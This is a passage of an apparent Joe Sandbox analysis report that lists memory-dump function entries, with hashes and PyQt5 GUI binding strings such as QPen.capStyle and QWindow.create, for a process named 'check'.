                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Point$?first@?$F@@@@Vector@
                                                                                                                                                                                                                                          • String ID: QPolygonF$first$first(self) -> QPointF
                                                                                                                                                                                                                                          • API String ID: 2594886209-3056036647
                                                                                                                                                                                                                                          • Opcode ID: 7a3b35c3a8bbd0901f5a3ea7221ce7359ee885096882996a9fd8529a72832553
                                                                                                                                                                                                                                          • Instruction ID: 88ffe52b599f4232f5de687953dbeb837fa1ba1620fb9bc4a72591231292e6ea
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7a3b35c3a8bbd0901f5a3ea7221ce7359ee885096882996a9fd8529a72832553
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 80012937A08B46C1EB108F65E8896A933A4FB54FD4F918032CA8E43320EF7DE559C744
                                                                                                                                                                                                                                          Function 00007FF89D971E80 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 32COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Style@$?capPen@@Qt@@
                                                                                                                                                                                                                                          • String ID: QPen$capStyle$capStyle(self) -> Qt.PenCapStyle
                                                                                                                                                                                                                                          • API String ID: 3055056925-4262466542
                                                                                                                                                                                                                                          • Opcode ID: 9c50474535562aca60f64786c4b8aec093e73eaed01a0293be1dfae6e3f5b507
                                                                                                                                                                                                                                          • Instruction ID: 7cfaa80d26fcacc08787bae97b09c335a7993b364de47b1c35f969e442ca3abd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9c50474535562aca60f64786c4b8aec093e73eaed01a0293be1dfae6e3f5b507
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 18012D36A08A46C1EB10DF55E8496A933A4FB54FD4F918032C99E43330EF7CE59AC344
                                                                                                                                                                                                                                          Function 00007FF89D935EE0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 32COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Touch$?maximumDevice@@Points@
                                                                                                                                                                                                                                          • String ID: QPageLayout$orientation$orientation(self) -> QPageLayout.Orientation
                                                                                                                                                                                                                                          • API String ID: 2297492979-2656156900
                                                                                                                                                                                                                                          • Opcode ID: a1ab2a2114099a1b95895cab7463e574abd8108494cf44a8bc6090f24cac1ae2
                                                                                                                                                                                                                                          • Instruction ID: c05b216f525de125d8bf9db4166709d980f741f6d55ff485571fb866b2f9805e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a1ab2a2114099a1b95895cab7463e574abd8108494cf44a8bc6090f24cac1ae2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9601D736A08A46C1EB109F65E8496A933A4FB54FD4F914072DA8E47320EF7DF55AC344
                                                                                                                                                                                                                                          Function 00007FF89D9A9D90 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 32COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?clearFormat@@Property@Text
                                                                                                                                                                                                                                          • String ID: QTextFormat$clearBackground$clearBackground(self)
                                                                                                                                                                                                                                          • API String ID: 55445122-3087451625
                                                                                                                                                                                                                                          • Opcode ID: 274df547a1825b7ddfb6c487d78f0caf85213a4b21e9e1c727d660c06faae4c4
                                                                                                                                                                                                                                          • Instruction ID: 76d1c54dea477f86bde49517f37a571a72ed9e8f794a92c33574bce65257b9b0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 274df547a1825b7ddfb6c487d78f0caf85213a4b21e9e1c727d660c06faae4c4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6F012D37A08A46D1EB108F15E8892A933A4FB84FD4F914032DA8E03320EF7CE56AC344
                                                                                                                                                                                                                                          Function 00007FF89D975D90 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 32COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?visibility@Visibility@1@Window@@
                                                                                                                                                                                                                                          • String ID: QWindow$visibility$visibility(self) -> QWindow.Visibility
                                                                                                                                                                                                                                          • API String ID: 4088591007-1278614163
                                                                                                                                                                                                                                          • Opcode ID: 5eb2c943aec9a995212ce031557793b3a03a24613a502bbf37782702e2a39408
                                                                                                                                                                                                                                          • Instruction ID: 4bb2ef44a8914da5eb3abe0f12d30962285a2d6c197b130c06bb5cbe9d05e1b6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5eb2c943aec9a995212ce031557793b3a03a24613a502bbf37782702e2a39408
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FA01ED37A09A46D1EB109F15E8496A933A4FB44FD4F914032CA9E47330EF7DE55AC744
                                                                                                                                                                                                                                          Function 00007FF89D969D60 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 32COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?nativeOrientation@QScreen@@QEBA?AW4ScreenOrientation@Qt@@XZ.QT5GUI ref: 00007FF89D969DAB
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Orientation@$?nativeQt@@ScreenScreen@@
                                                                                                                                                                                                                                          • String ID: QScreen$nativeOrientation$nativeOrientation(self) -> Qt.ScreenOrientation
                                                                                                                                                                                                                                          • API String ID: 3792427072-1851680853
                                                                                                                                                                                                                                          • Opcode ID: edc79f3ecc34f9eea69f28605863bf7f32773241f612082dac7cc7bd0a0cadf1
                                                                                                                                                                                                                                          • Instruction ID: ce62e2fc01afa03a6b8eeb264a934481bdf2fb47a02889de826f548aa3845985
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: edc79f3ecc34f9eea69f28605863bf7f32773241f612082dac7cc7bd0a0cadf1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B501E976A08A46C1EB109F65E8896A933A8FB54FD4F918032DA9E43320EF7DF559C344
                                                                                                                                                                                                                                          Function 00007FF89D987DB0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Bool_FromLong
                                                                                                                                                                                                                                          • String ID: QTextOption$useDesignMetrics$useDesignMetrics(self) -> bool
                                                                                                                                                                                                                                          • API String ID: 2610644205-2644750750
                                                                                                                                                                                                                                          • Opcode ID: d248faae69c860b4fe41775bb58a5bc7df6ad01d805deca51f9da0dbde0ea471
                                                                                                                                                                                                                                          • Instruction ID: 1cb8f5d7324924d1b892e7d540af04a99fe1ff0f15aaed7b7a3278e83ae777b4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d248faae69c860b4fe41775bb58a5bc7df6ad01d805deca51f9da0dbde0ea471
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4B012C36A08B46D1DB10DF51E8896A933A4FB44F94F914032CA9E07320EF7DE559C384
                                                                                                                                                                                                                                          Function 00007FF89D95BD80 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?create@Window@@
                                                                                                                                                                                                                                          • String ID: QWindow$create$create(self)
                                                                                                                                                                                                                                          • API String ID: 1733840589-1948277933
                                                                                                                                                                                                                                          • Opcode ID: cada4c10d51697eae09278391e6f499017bc0fb5d0ab38c45172874949b078b5
